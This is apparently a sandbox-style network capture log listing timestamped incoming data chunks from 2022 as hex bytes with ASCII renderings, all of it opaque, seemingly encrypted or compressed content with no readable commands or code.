                                                                                                                                                    2022-09-29 12:59:02 UTC4322INData Raw: c0 43 25 18 52 d0 6c d0 14 d5 d7 d0 91 ce e8 b1 1d 00 42 18 00 91 0f bc 62 2f 3c 2a e6 92 2e 9b a8 1b 64 65 d2 a4 68 87 c0 e5 e7 8a 43 6b 0f 6c 3f 83 3e f6 77 29 a5 98 32 0a 4b 95 0b af ca 38 08 b6 6e e8 a3 12 ab 22 c2 30 c0 20 1f 2d a2 00 74 5d 79 85 32 17 7c 5e b7 63 f6 9f 6c 60 81 fe 21 44 94 4c ca 6a b0 ec ae 34 d3 01 44 ea f4 09 51 af 92 45 ea 64 19 ba 61 07 08 ca 77 48 72 5d 03 32 c2 d2 2c 3a 4b 2f 3d 29 e1 f7 14 fc 27 2f 38 70 5a e8 13 bf e4 2b 37 d1 9e 28 7f db 51 71 9f f8 10 bd 87 fb 09 e8 55 89 b5 0e a6 33 fd 95 01 e8 fb 5f dd 33 51 85 7e e3 f1 ab 38 2d 28 69 62 bf 4f 37 98 c2 c4 fb c2 63 5f 2d 6a 1d b2 5a 0a 99 d4 1e 14 8f e1 6d 9d 58 e0 1c b2 10 99 97 a4 e1 5a e5 e0 90 79 74 b1 61 26 e5 e0 70 31 95 8c f5 5b c6 c4 e4 73 21 29 c7 03 f6 3c e7 13
                                                                                                                                                    Data Ascii: C%RlBb/<*.dehCkl?>w)2K8n"0 -t]y2|^cl`!DLj4DQEdawHr]2,:K/=)'/8pZ+7(QqU3_3Q~8-(ibO7c_-jZmXZyta&p1[s!)<
                                                                                                                                                    2022-09-29 12:59:02 UTC4323INData Raw: 87 51 21 89 d6 11 6d cb 79 45 75 40 76 16 6e f0 07 91 44 cd 9c f0 ed 25 25 f0 12 e7 0f 2b 40 f0 5b ab 96 22 21 38 09 26 cf 2c f0 5d b1 fe 24 a0 87 27 6f 71 aa a3 69 54 44 06 e6 87 2d f8 69 9f 15 18 51 ef 7a ed 8b 62 d5 ae f9 c8 53 7f 78 59 2e c7 70 bf 8e 21 d6 28 a0 2b 3d a6 75 02 04 a6 f4 45 39 93 69 4d 55 88 b6 43 8e 9f f7 91 d4 c2 e4 22 eb 0d ec 70 45 4e 0c ba ff 4a 07 d7 7e c6 0f b0 b7 c1 35 98 23 f7 a3 8e 41 82 9b d0 1d 5f 1f 1f c2 8d 55 2a 6c e9 b1 40 c1 f7 89 e0 f7 b6 0c 3e f1 50 69 66 60 0b d6 f4 c3 14 d3 33 5e 17 6f 58 d0 60 68 2e 0f e3 72 d2 1a 60 62 5b 4e 28 58 87 b5 ee d1 95 eb 97 a2 c0 bf 22 94 89 f7 e2 5d b2 c6 80 aa 6c c2 ac 16 cd 1a fd 70 95 e6 8c fb c6 a0 4d ee d3 51 b3 f1 b6 4f 6f 78 6d 4d 88 e5 34 95 f1 6d dc 81 e6 30 cf cd cc 54 c6 c7
                                                                                                                                                    Data Ascii: Q!myEu@vnD%%+@["!8&,]$'oqiTD-iQzbSxY.p!(+=uE9iMUC"pENJ~5#A_U*l@>Pif`3^oX`h.r`b[N(X"]lpMQOoxmM4m0T
                                                                                                                                                    2022-09-29 12:59:02 UTC4325INData Raw: 08 d2 fb 1a e4 cc c5 67 54 64 c7 63 41 52 fb 82 db 21 63 3a 9b 88 f9 a8 95 c4 c2 23 c7 ba 21 85 85 5c 7d 12 ba b6 2e 2e ef 8e 71 e5 c2 6a da eb 6e 26 b0 10 88 31 3e a6 fa 10 28 1c 15 f3 de ca 7a 61 f5 7a 3b 86 b3 1d f9 4f 0c d4 15 f6 af 5b 55 5f 2d 56 d4 6b 0b 1b a1 b5 a9 9a 40 bb e2 fb aa b6 da bb e8 5f b5 86 19 fb e5 0a ee ba a7 af 5a 68 b8 2f c3 b3 7e 26 95 c6 8e e1 6e 0e c7 0d 2e 5b 39 ae 1f 55 fc fb c4 1b a4 25 a8 7f 6c 3a c7 e6 b7 34 91 dc 7f 26 32 a0 44 77 66 0b 20 6f 3f c0 dd 14 9b f0 35 a4 fa 52 4e bf 1b 4d 0f b6 cc 84 b5 98 11 7a 2e 3b 79 b0 f7 b1 ed 42 e1 bf 20 9f d4 f1 ca e7 a7 a8 02 b2 a0 cb 8d c0 ed 5b be 21 39 7c ea b4 d4 79 02 e6 5d 51 59 63 69 6a a2 31 aa a3 68 ef 5e cf cc f9 8c 62 0e 39 af 05 11 9e 3c 54 46 33 05 19 b8 12 63 ed 42 f2 7a
                                                                                                                                                    Data Ascii: gTdcAR!c:#!\}..qjn&1>(zaz;O[U_-Vk@_Zh/~&n.[9U%l:4&2Dwf o?5RNMz.;yB [!9|y]QYcij1h^b9<TF3cBz
                                                                                                                                                    2022-09-29 12:59:02 UTC4326INData Raw: 03 a3 8f c7 d3 76 8f 03 20 1f e7 4e be 90 57 7a 07 33 e6 f9 b1 61 92 e8 e4 63 3d 31 df 0a 16 c9 e6 5c 97 b7 44 3c 83 9c 8f 6c 14 d4 4d 51 9d ed 00 b8 c1 05 bb 33 c9 4c 07 89 f6 fa 26 4a 49 df 17 19 76 62 d5 3c fa f7 6e 95 1e ad da 3c dd 2b 43 63 d6 5f 8c b0 bc ab e7 13 42 eb 11 51 f9 15 6a 0f e5 e6 f8 a7 05 c5 8c 69 7f b9 cf 4e 36 19 05 a5 86 09 26 cf cd 4f 21 65 2f f0 e2 07 66 1a 72 98 3d e2 bf ae 74 63 26 88 98 3f 9c 39 e6 38 ef 96 7d 1d d0 a8 48 4b 42 14 d4 d8 2c 31 6a 3a fa e9 13 a8 7c 5a 0c 2c 18 bb fc 56 d1 be 90 0a b7 e9 16 06 8a 46 fc b4 0a f2 f1 85 e3 96 16 28 b6 88 df 63 71 7e 21 9d b2 ed e6 a1 0a 79 4b 34 3d d3 b3 c9 77 11 d7 59 65 bd ea b5 88 0c 4a 42 c2 97 2d fc b6 d4 19 51 75 5f a1 e4 c3 46 23 f8 76 a7 e8 4d a1 05 0f 41 f6 46 d8 43 5b 5d d9
                                                                                                                                                    Data Ascii: v NWz3ac=1\D<lMQ3L&JIvb<n<+Cc_BQjiN6&O!e/fr=tc&?98}HKB,1j:|Z,VF(cq~!yK4=wYeJB-Qu_F#vMAFC[]
                                                                                                                                                    2022-09-29 12:59:02 UTC4327INData Raw: 1d e0 87 e7 91 db 41 98 a2 47 96 3d 69 fb 29 46 27 1b 98 e4 2e 23 d7 00 82 82 5e da 5d eb a5 31 f1 86 77 60 47 d0 c1 37 93 4b bd 33 e3 81 da bd f2 29 e4 02 cb ce 49 4a 28 13 47 21 08 94 36 c8 3a 4c 5e 3c 80 2c 1f c2 66 e8 24 14 2f 3b 6b cb 93 e4 46 fe 9a a5 17 ef d9 68 89 03 d3 f7 e6 ce 41 a2 73 8e cf bd 14 4e e0 74 70 93 4b 02 21 f1 71 b0 79 cc 7e 26 0d b3 f9 a1 a7 94 f8 f1 fa 6a 31 e7 ae f3 53 45 9a e9 f3 af a9 97 d7 f1 fe 34 38 55 14 cb 0b f2 69 7a 9e c2 f1 ed 60 b8 1b e4 d1 da 71 82 7f 44 01 b7 01 ab 58 aa 85 d6 07 e0 8d dc ac f3 22 0e 92 31 d4 72 7c 52 a0 27 b2 8d 33 38 ce 43 f6 4d e7 eb db 6a a1 a6 0e cc 5b b3 0f 5a 15 51 ee e1 f4 14 65 4b 9c 5e 2a 80 7e 21 d2 09 43 7d 75 49 c6 9f a3 fa ee 8c 88 95 ac 95 8a b4 ba a1 89 4f 1e 98 a0 3a 8d 08 71 f0 b3
                                                                                                                                                    Data Ascii: AG=i)F'.#^]1w`G7K3)IJ(G!6:L^<,f$/;kFhAsNtpK!qy~&j1SE48Uiz`qDX"1r|R'38CMj[ZQeK^*~!C}uIO:q
                                                                                                                                                    2022-09-29 12:59:02 UTC4328INData Raw: 2b a6 d8 e2 4c 8d 60 44 03 5e ef ce 4d 8f 97 ca 25 f4 b8 a1 da 9c ba 2b ed 79 4f 91 02 2d 3c a4 b7 10 3f 87 d0 f1 74 c5 2d 1a 57 39 72 39 1b 92 fd d8 2d 5e 64 4a 12 55 2c 18 5f 39 05 5e 98 17 41 8d 1d 59 fa 06 a7 67 31 86 e9 ed d8 d1 a2 b2 05 94 79 57 1e 24 57 c8 d7 99 7b 28 39 74 94 44 70 5b d0 87 c1 ea b5 f1 d9 76 28 fd 10 20 29 bd 65 cc 61 b1 3b 59 00 e5 92 39 1b 6b b2 aa 7c 3c 7b 4c 0f 41 6d 9b c8 56 41 64 19 77 97 d0 7c 59 c6 16 e9 ff 51 31 c9 70 d6 eb a2 68 6e 2f 07 c8 6b e9 db c3 8a 44 66 26 1e 6f 92 e8 9e 90 10 01 ae e9 6e 08 cd 8f a3 c4 70 03 d2 72 49 e6 5e 15 c7 0a 93 1b 9e 78 21 48 d2 03 11 22 d0 ff 7e 0e 13 7f fa 01 25 7e 08 c7 74 fe cf f7 80 73 40 d0 d3 fc 92 00 12 0d 40 54 76 53 eb 3d 33 3e 68 09 72 64 43 bd b6 e9 aa 42 28 04 de 94 19 8a 3d
                                                                                                                                                    Data Ascii: +L`D^M%+yO-<?t-W9r9-^dJU,_9^AYg1yW$W{(9tDp[v( )ea;Y9k|<{LAmVAdw|YQ1phn/kDf&onprI^x!H"~%~ts@@TvS=3>hrdCB(=
                                                                                                                                                    2022-09-29 12:59:02 UTC4344INData Raw: fd 32 3f 86 3d f0 dd 78 89 30 04 9e 95 69 b4 dc 1a b5 4a e6 18 38 50 9f 25 a9 a2 8f 80 55 05 e6 76 64 19 d0 a3 2b a3 51 d6 31 e7 1a d6 e5 24 d0 fa 40 17 9a e0 47 d5 37 be 2f 88 19 50 52 35 4d 5c 26 0e d4 84 51 01 0a 3c 65 2b 68 0e c5 80 bf f7 e4 c7 3d fa e9 19 a9 52 65 b7 6f d1 ff c8 e2 c6 66 c2 3a e8 87 ad d4 0d dc eb ee 0c e7 1c 5c 43 2f e0 6d 29 10 38 f6 3a 0c 30 a3 e6 cb a9 6d b9 af ee 33 0b 7f 50 6c b1 df 12 ac e3 dc d0 67 a6 01 29 6e ee 1b 43 9f 6e 8d e4 18 6e 2a c6 f6 96 ea 97 1f 3e 3d ba 2a df 22 22 a5 57 a3 bc 00 bb 14 20 ec d2 6f b0 55 3a 98 1f a9 0d 6a a0 bb 7a 7c 00 28 09 60 38 84 2b 09 a1 f6 5e d7 81 d0 77 aa f2 12 80 47 af 25 53 7d 33 bd f8 0a c4 79 bc 05 81 31 bb c2 23 65 1f 7c 4f f9 2a 69 8f f7 f5 06 f4 3d c0 0b b9 00 e2 f3 ce 13 cb 1f 76
                                                                                                                                                    Data Ascii: 2?=x0iJ8P%Uvd+Q1$@G7/PR5M\&Q<e+h=Reof:\C/m)8:0m3Plg)nCnn*>=*""W oU:jz|(`8+^wG%S}3y1#e|O*i=v
                                                                                                                                                    2022-09-29 12:59:02 UTC4360INData Raw: 73 d3 c3 5f c2 9a 05 48 ba 5a 5a d4 db a8 cb 8d d0 fb 64 36 e0 21 b7 bd 83 4e 9b e8 c0 9d c7 1f 22 6e 9c 2c bc 13 d0 ac d7 5f 99 91 a3 58 af af e0 f2 84 7d e5 22 7c bd d1 c8 6c a8 6d 80 2d 62 68 5f 21 fa 66 c8 99 18 40 56 8e d9 94 ce 04 ce 3b f1 52 00 a9 12 9e 44 42 90 24 14 9e 7c 20 30 47 9f a6 b2 12 63 89 97 99 05 ce a9 76 c6 42 e7 5d a5 5d 5a 0f 47 8c 2f a4 f9 ef 3c c2 44 e7 85 e6 0f cd 89 a5 f1 25 3b 9c 76 cd 24 41 44 f0 23 98 6e 90 39 c1 5c 62 e7 89 ae b4 88 4f 62 4f ce a4 00 dd b3 06 e0 f0 04 48 46 b0 8e d4 3b c8 75 99 06 e5 26 57 9b 37 ea f7 7e 52 9e 53 8d b5 29 0e b0 25 79 9a 4c 2b 12 29 53 12 d9 6c 08 24 a9 f2 10 c8 fb 95 30 d0 8f 2f c2 d5 be 01 06 02 5c 84 9b c2 3d 86 04 11 e0 89 de dc 5e b8 ce 2f 0a d6 13 43 29 2e f9 12 26 22 32 a3 e8 f8 36 88
                                                                                                                                                    Data Ascii: s_HZZd6!N"n,_X}"|lm-bh_!f@V;RDB$| 0GcvB]]ZG/<D%;v$AD#n9\bObOHF;u&W7~RS)%yL+)Sl$0/\=^/C).&"26
                                                                                                                                                    2022-09-29 12:59:02 UTC4376INData Raw: 54 5a ae 7b 73 61 9c 5f db 19 95 24 c5 4c 37 b5 87 c9 5a f9 94 9b 49 9c 2f 74 8a 7f a9 31 dd 72 04 bc c4 44 60 5e 9e 54 81 51 b3 8a 77 3e 48 aa a3 3a ca 15 df 81 df cf 75 3c e3 d3 51 47 0c ff c4 bc ce 74 42 a5 97 50 ef 1c 95 d2 fe 2c a5 ae 85 42 97 5b be fa bb 96 21 8a a2 60 57 87 47 d4 c0 66 ac 09 ed 92 5d c2 ee f3 2f 65 a9 06 f1 a6 a4 7e 47 34 48 39 61 29 61 03 91 50 75 9b 79 f8 8c db 69 4c cc f5 ad ff ea d4 ee f3 5f ad 1e fc 20 fd bd b1 36 88 ef 73 71 81 03 2f 3b 6d 47 fc 4b 1a 94 70 46 7c 4f ff 3c ec bf 05 6f 01 f8 dd 84 e7 6e 05 e4 cf 5f 36 2d 2b 0f 1f 97 b8 06 ec 4d f5 6e f4 d2 e4 b3 9e cb 9a 7e d4 6c b6 87 56 02 45 79 33 17 0a 49 3f 18 2a dd ec 78 56 19 1e 1d 50 1f 79 23 94 2f 0d f3 78 98 5e 7a 7e 1d 4a 54 57 15 90 46 86 d2 08 ad 77 ae 5c 21 90 e5
                                                                                                                                                    Data Ascii: TZ{sa_$L7ZI/t1rD`^TQw>H:u<QGtBP,B[!`WGf]/e~G4H9a)aPuyiL_ 6sq/;mGKpF|O<on_6-+Mn~lVEy3I?*xVPy#/x^z~JTWFw\!
                                                                                                                                                    2022-09-29 12:59:02 UTC4392INData Raw: c3 dd 35 e5 28 0d 54 40 4e c2 d4 fd d0 92 78 d7 85 9f 06 8c 00 ef a5 1e e4 8c c6 69 ac f8 fd 23 b5 4c 22 3f 6a 08 42 2f de 1b f8 16 73 06 87 67 6f 91 e1 3e 48 bb 76 a9 a2 cf 0b 5f 11 19 85 85 ec e0 27 f0 32 7d d7 ea f2 89 18 87 e9 df 3e 64 80 c9 b6 83 a4 0a ab 0b c0 b8 f0 e4 1e 06 bf f8 75 b2 3f 8d 6f 58 32 91 dc 0b 62 ac a2 fa 5b 94 cc 01 7f c9 42 db 2e b1 0b 24 49 6d 9b cf 3f 3d c7 f9 d2 33 b2 cc 19 f0 ad c2 b2 3c 27 64 c4 80 74 3c 80 42 b2 91 8a fc a2 95 31 1d 67 7a 5c f0 c0 0d be 5b 8e 8d b0 bd 9c 03 1f 69 cd 28 8b e3 4a 87 8f ba 70 e5 19 19 37 2a 20 54 70 05 d3 d3 e3 b1 12 65 b9 50 ec 1c fc 51 cd 35 1d c1 e4 ed 96 ad fb 4e c7 d2 96 69 13 42 7a a8 e7 b8 ec 2e e5 a5 62 9f c9 23 7d b5 4a 15 f6 ab 67 e3 cc 0d 96 f3 95 46 1a 81 61 c2 1a 15 0f 65 ed ab 99
                                                                                                                                                    Data Ascii: 5(T@Nxi#L"?jB/sgo>Hv_'2}>du?oX2b[B.$Im?=3<'dt<B1gz\[i(Jp7* TpePQ5NiBz.b#}JgFae
                                                                                                                                                    2022-09-29 12:59:02 UTC4408INData Raw: 59 fa 7d 54 e5 b7 f6 83 76 54 51 a1 59 de 61 3a 0e a1 9f fe a9 7a 04 92 0c 8d 1e 90 99 69 77 2a d6 cb 51 8e 90 a6 8b 10 6c 26 cb 59 1e 46 ee 4d 16 d4 25 32 59 b6 ff 4f 9e 57 57 58 47 fa bc 0b f8 1e 54 83 76 83 64 03 c1 26 1d c1 8f bb 22 df a5 9d f7 c6 ee 4f d7 bf 2f f0 a5 a1 00 d2 4e 10 56 de d1 1a 47 61 76 56 7b ac 09 73 8d 82 de 68 fa d7 2e 80 73 90 a9 3b d3 88 5f 98 fc 7e 3c ab c3 9e 44 49 f8 b1 78 d0 20 50 a7 95 d8 3d 3c 5e 7d 29 99 3a a3 be fe 0a 70 2b da 83 6a e7 a4 36 03 a5 2b 5d ad 7c 97 fd 7d 3c c5 a6 12 aa 2d 61 35 b8 6f c7 e7 7b 01 46 05 53 2b 31 27 f8 5e 0f b6 bf 1a 16 d7 ca 0e b4 e5 1b d5 da 7d 44 53 1d 47 41 90 97 b4 20 73 ce 9f e5 8d ed 02 92 85 cf a6 f3 68 1e 7d 93 d6 90 0e c2 43 92 c6 ba 03 1b a3 b8 76 60 2a c3 27 99 eb ae aa 39 fc b9 ee
                                                                                                                                                    Data Ascii: Y}TvTQYa:ziw*Ql&YFM%2YOWWXGTvd&"O/NVGavV{sh.s;_~<DIx P=<^}):p+j6+]|}<-a5o{FS+1'^}DSGA sh}Cv`*'9
                                                                                                                                                    2022-09-29 12:59:02 UTC4424INData Raw: 46 35 b0 0a e9 08 27 b1 f0 d2 be 9f ba cf e1 d5 ad 7f 47 25 fd b4 b1 b1 8b 1e f2 7f 35 40 37 41 3a 77 c7 8b fc 0b 7d 97 af 97 f0 d5 df 82 81 62 76 d0 27 13 9e e9 9d ef 1c 43 5c 5c 84 ea 63 9b 6b 7c 8d dc f7 17 2e 18 5b 28 2d 33 79 5a 37 68 6e 5e 16 5d 3a f6 7c 62 c6 81 54 81 f9 0e 8c b5 f1 79 90 6e 52 a1 16 f1 6e a3 31 4c e9 cd ee 96 f7 d6 f8 ae 47 99 a2 d2 3f 45 24 3b af 32 f3 4f 31 ae 48 a9 09 16 a7 d4 6d 27 29 1b d5 4c 60 66 99 cf 0e c5 99 ab d4 96 e5 9b 6f ca 16 6f dc ad cd df 66 b9 1a 80 44 29 35 d0 2f 3b a9 9a 2c 3b f6 e7 48 2c 8c 2f c3 98 04 0c 2c ca 4b 3f fd 9e bc 70 84 4d 19 0f a9 00 dd 14 d7 9c cb 6f 72 41 67 60 95 3e c1 06 96 e7 ca 9d 4c 50 bb 31 c3 63 df 12 ad 87 e7 20 a2 c7 de 59 68 f5 47 d7 7f c8 e2 d2 0b 70 8f 7d 29 20 cb 88 d1 9e d7 1f 01
                                                                                                                                                    Data Ascii: F5'G%5@7A:w}bv'C\\ck|.[(-3yZ7hn^]:|bTynRn1LG?E$;2O1Hm')L`foofD)5/;,;H,/,K?pMorAg`>LP1c YhGp})
                                                                                                                                                    2022-09-29 12:59:02 UTC4440INData Raw: 1d f1 2f 57 61 d0 9f ce 9c 65 c9 df 40 e8 43 53 9d 6d 47 0c e7 09 ee 5e a0 5a f2 ff f5 4f 48 9b 28 52 80 fa 1c f2 08 d8 7f ac 1c bc 32 42 b8 3c 7b fc cd 1b 95 a0 f6 23 6f f8 a1 7f de 34 ad d2 d3 87 62 6a fd c7 a9 3c 22 05 2c 6a 8b c6 7b 38 7e fa ad 64 7b 7d a0 d9 0e 4b ff 06 08 7a 4e fe ae 0c a8 87 a3 36 89 e4 07 63 b6 63 be a1 1e c9 89 39 80 a2 94 07 cf 3b ad 6a d3 bb f5 32 1b a0 f0 c6 e0 c5 9b 89 8d 91 3f aa 17 12 46 4d d7 f4 24 6f f0 c9 79 f0 6a aa de d6 7a ef d3 0a c5 27 37 34 77 59 3f 7c 93 b6 c6 a7 56 fa b9 16 21 a1 bc 18 f1 d2 5e ce 32 f7 03 dc a9 1b a6 f4 4a aa 67 61 be 7e 22 0b e8 85 7f 47 a3 13 94 20 d3 c4 17 cb 68 a6 58 07 ed 0f 16 56 35 d3 ec 9c fc c7 44 91 93 5c 5f ca f8 21 b0 0f 30 b0 19 99 a4 a6 f5 eb c2 de d0 5e ed b9 ee 68 37 59 d8 0e 1d
                                                                                                                                                    Data Ascii: /Wae@CSmG^ZOH(R2B<{#o4bj<",j{8~d{}KzN6cc9;j2?FM$oyjz'74wY?|V!^2Jga~"G hXV5D\_!0^h7Y
                                                                                                                                                    2022-09-29 12:59:02 UTC4456INData Raw: e4 d3 73 21 d8 d5 d1 07 31 a9 ae d7 00 1a 8e 15 3f ba e1 9d 77 66 49 47 57 b8 15 68 90 e9 17 38 38 8f a8 90 be ec e4 4b 27 8a cb 72 d1 73 0b 81 33 ba 1c 3b 90 44 a1 07 41 7e d4 a7 d5 84 1c 01 23 fa 97 6e e1 3d 32 72 2c 43 68 49 2b 5b 35 4f ea 6d 1d 87 2b 1f a7 c9 a4 56 af 6f c5 3e 1e dc 18 25 8e 1b 8f 92 0d df eb 95 73 42 e9 f1 f5 7f 10 b0 d9 a0 a8 46 1f 7e bd 89 c6 e6 35 c6 c4 8a 31 b2 d4 44 45 0a a8 51 c6 04 99 02 1b ac 36 db 5c d3 ff 18 d2 97 2f a2 13 b5 34 06 05 ea 40 0d a3 7b ee 61 ed d4 b7 fe 3f 3d 13 37 1c e9 28 f9 69 38 74 db 35 aa 5c e4 7b ba c8 3f be c1 95 db 18 45 26 aa 28 8b 14 58 67 ed b3 2b e8 6a 92 b7 0c 30 1f 54 d9 09 22 1e 32 4f 4a 53 12 e6 ca 22 71 56 1c 33 06 f7 93 ac 80 eb 65 35 5d 65 5b 29 fe 1b c3 9b e9 fc 54 1b 28 d0 9c 53 60 95 2b
                                                                                                                                                    Data Ascii: s!1?wfIGWh88K'rs3;DA~#n=2r,ChI+[5Om+Vo>%sBF~51DEQ6\/4@{a?=7(i8t5\{?E&(Xg+j0T"2OJS"qV3e5]e[)T(S`+
                                                                                                                                                    2022-09-29 12:59:02 UTC4472INData Raw: f9 13 60 2f 27 00 ba cf a7 69 88 9d 1e e1 76 32 d9 c0 7f e6 af 3c ac f3 6f f4 f9 8c 8c 86 7a c4 99 25 8c e5 f3 93 be 2c b5 5c ba fe 91 d7 3d eb f9 61 97 13 61 e3 a0 ad 72 d9 2a 30 85 85 da 06 4d 50 61 8b 1f 03 25 42 3c b6 93 2b 18 43 0b e3 67 00 93 d3 75 6c c6 62 ad c5 c3 e6 3b 52 6a 08 20 90 f6 8a b2 14 f2 dd da 29 f6 ec 9d 8a 45 ce 33 0b 9f 61 5d b6 0d a4 1f a1 80 e1 ad 41 79 05 16 2a f7 a5 23 e0 d9 d5 52 7b ab 34 b3 d2 61 8d b3 06 c3 e4 d4 bc 2c 1d 87 f6 9e 11 43 1e 4d 3b 62 53 e9 a3 e9 71 9a e7 80 ae 59 c4 ae 36 68 a0 01 c7 83 e5 a6 ac c4 68 37 4e 5c 2e d0 d9 4e b8 ec 18 e4 72 35 86 04 de fd cf c0 e4 4c 71 c1 53 71 0b 47 e9 ff 0b ad 60 29 df 16 90 8f 5a 43 d6 40 c0 2a 38 2b 38 6d 53 d0 4c d1 03 a0 43 35 f1 82 47 08 99 6a 0c 03 0e 28 20 f0 55 a3 c2 57
                                                                                                                                                    Data Ascii: `/'iv2<oz%,\=aar*0MPa%B<+Cgulb;Rj )E3a]Ay*#R{4a,CM;bSqY6hh7N\.Nr5LqSqG`)ZC@*8+8mSLC5Gj( UW
                                                                                                                                                    2022-09-29 12:59:02 UTC4488INData Raw: c8 d7 df df 21 00 d3 9c c9 e7 6a 22 d8 1a 3c 17 ad 26 6c 74 b4 ba ba ae b9 bd a3 7e 49 36 1c c2 bb 0b 53 c9 99 53 22 74 e7 0b 4c a7 9d ae d9 8b bc cd 25 b1 68 36 79 ad b6 31 0d af 0c 38 21 77 d9 e6 24 00 0e 6a 87 50 ba 62 a6 e9 5b fe b2 e1 00 95 b5 35 72 0c 3e e7 4e f6 80 70 70 cf 49 45 f7 93 cf 30 da 23 92 8c b4 e0 e0 15 0c c5 b4 e6 3f d9 85 a8 cb 92 f5 0f d4 72 c3 37 02 20 e5 fd cd 32 23 14 b3 e8 bf 07 37 b5 d7 f8 ed 6b da 6f 6b d0 bf e3 89 e3 85 35 69 af d5 93 23 f6 22 60 4a 06 49 12 13 c1 fd 66 2a bd 25 05 9d 8d a0 fd 99 f2 38 b8 e4 41 64 4e bd e5 df 96 25 c0 f6 2b 53 a9 7c 49 00 23 61 22 dd 15 e7 b8 b2 bb af 0c af 25 a4 2c 10 ab e1 45 7a a0 9d 99 bd c8 96 eb 28 d0 d3 67 46 29 87 48 33 f5 a0 8e 04 7f 00 4d 8b e7 72 0a a6 04 d0 4a 2e 62 bc 10 70 c9 c8
                                                                                                                                                    Data Ascii: !j"<&lt~I6SS"tL%h6y18!w$jPb[5r>NppIE0#?r7 2#7kok5i#"`JIf*%8AdN%+S|I#a"%,Ez(gF)H3MrJ.bp
                                                                                                                                                    2022-09-29 12:59:02 UTC4504INData Raw: bb c5 9f c9 a3 eb 64 0b 19 88 43 04 67 61 df 5a 6c 94 8e 61 6a a8 d0 99 f4 3a 75 0f 5d 18 da 91 c8 50 da c6 bd 32 00 31 b6 7d 41 93 34 e0 9a ae 30 28 4a ed 6f 96 ca ae 4b 21 09 2b 0f 7d c9 ca 40 22 d4 40 82 95 e9 0e a4 2f 60 dd 32 c9 c4 95 fc dc 32 e0 da cc 43 a2 8f a5 71 b8 56 ee 91 f6 9a 6d 2a bf fd 92 c6 db f3 6f c5 d4 b2 8a 37 6e bf 9e 83 c9 27 b7 77 d4 7e c2 de 4c 88 f0 ca 48 cb 57 66 9e a9 46 bb d3 e2 03 ae 8e d5 36 cf 60 d7 35 3a 07 4e e4 2e 31 9b ba af fe 57 a3 81 41 e0 52 23 0a fb 55 e2 7e 86 8a 61 81 3d 26 7b f3 1b eb 2c 31 1d d2 f3 72 4c 83 17 7e 26 cc 71 56 de 81 2b 6c e1 73 93 aa c4 b1 a3 4f 35 58 92 4b 5c af 34 c8 10 75 49 2a 44 1f dd 05 b1 75 1e e8 76 38 34 b2 41 c6 e4 12 02 69 7a 9e 7a d6 cd 83 2c 84 06 74 0e ca d7 07 ca ed 25 47 6d 60 73
                                                                                                                                                    Data Ascii: dCgaZlaj:u]P21}A40(JoK!+}@"@/`22CqVm*o7n'w~LHWfF6`5:N.1WAR#U~a=&{,1rL~&qV+lsO5XK\4uI*Duv84Aizz,t%Gm`s
                                                                                                                                                    2022-09-29 12:59:02 UTC4520INData Raw: 0b e7 89 e0 d9 54 26 4a 68 09 76 95 25 b5 5d 69 69 2d d8 e5 5a b5 09 5a bf 75 c6 56 7f 3b 86 1d e5 33 c8 a3 c7 71 7e 0a 79 e5 d8 90 1c 59 e8 1c 78 0b 52 89 5d cd de fc 00 e8 7b 9a 2e b4 71 27 3c 1e 44 7f f4 27 11 58 d2 8c 69 a2 76 65 b5 45 2f 29 8c ca 95 49 3e 80 ee 01 29 57 74 72 15 45 e3 9e 26 3a e5 9f fc af 37 19 5b 3f 75 f5 fd fc 0b c8 cb 20 42 5f 42 f2 8d 9c 70 b4 79 52 2d 48 f2 51 2b 1e 5f 41 cd cd 1b 6f d9 1a 1b 98 4f 8f 16 7d 18 05 cd 9b e5 59 2a 26 96 a2 b5 57 c5 f1 0e 2a e6 6c 50 3a b6 85 4a c7 f4 65 6a fd b4 f5 0d 88 49 b2 df 70 da d9 58 56 13 c6 12 09 3f 0b 46 3b 65 6e e5 b7 50 eb 5c 3a 3d 46 ba 45 50 e0 18 f3 76 2f 8b 8a 3c a6 94 58 56 cf 92 0b c3 92 c2 80 27 67 ce 4b f6 ed e1 19 57 22 f0 a8 dd 7d be 20 ac 16 19 b9 1c 6e 2b 7d b6 3d d4 6f bb
                                                                                                                                                    Data Ascii: T&Jhv%]ii-ZZuV;3q~yYxR]{.q'<D'XiveE/)I>)WtrE&:7[?u B_BpyR-HQ+_AoO}Y*&W*lP:JejIpXV?F;enP\:=FEPv/<XV'gKW"} n+}=o
                                                                                                                                                    2022-09-29 12:59:02 UTC4536INData Raw: cf a6 49 51 fa 03 65 75 7c 81 c6 fa 9f 6a 91 a4 19 1d 1d c5 b0 0d 6d 99 c8 26 01 f9 0a 09 4c ba 97 53 c8 ad d4 54 0f 3a 49 37 4b 08 37 32 c5 9f d4 6e 25 14 64 28 25 5f 05 c5 28 0a 2e dd 40 db 2c 40 93 25 14 53 ac 43 1c 27 c2 74 1a 91 27 8b 9e 17 5b 07 62 11 c4 b7 47 6b 39 6b 9e fa 07 63 bb 99 8e 3e b1 e9 47 70 2c e7 df e6 83 42 e3 6a d2 2e 21 f2 99 7d 4b 2e 29 94 f2 c7 f4 cc ee a7 74 18 4b 76 15 a8 52 9e f5 2c 43 c3 5e 4d 8b e4 cc c5 17 3f 89 01 17 31 22 cc 7f 7d 97 8b 18 e6 ca 89 61 e8 a3 e6 30 25 e3 8b f7 1a aa 0f 8d 14 47 62 41 be 2a 9d d5 95 7e e4 23 42 8c 4c d6 fa d8 50 74 fe 0a a5 c3 16 c1 e2 ff 99 df 76 1e bf 60 28 cd c9 89 46 2d 18 7b a1 10 95 a0 89 23 87 20 6d 5e 91 81 e0 ed f4 a1 07 da f3 aa 83 11 3d 5f f4 7b 51 9d 98 b2 11 ea 0c 5d 0c 43 5e 3a
                                                                                                                                                    Data Ascii: IQeu|jm&LST:I7K72n%d(%_(.@,@%SC't'[bGk9kc>Gp,Bj.!}K.)tKvR,C^M?1"}a0%GbA*~#BLPtv`(F-{# m^=_{Q]C^:
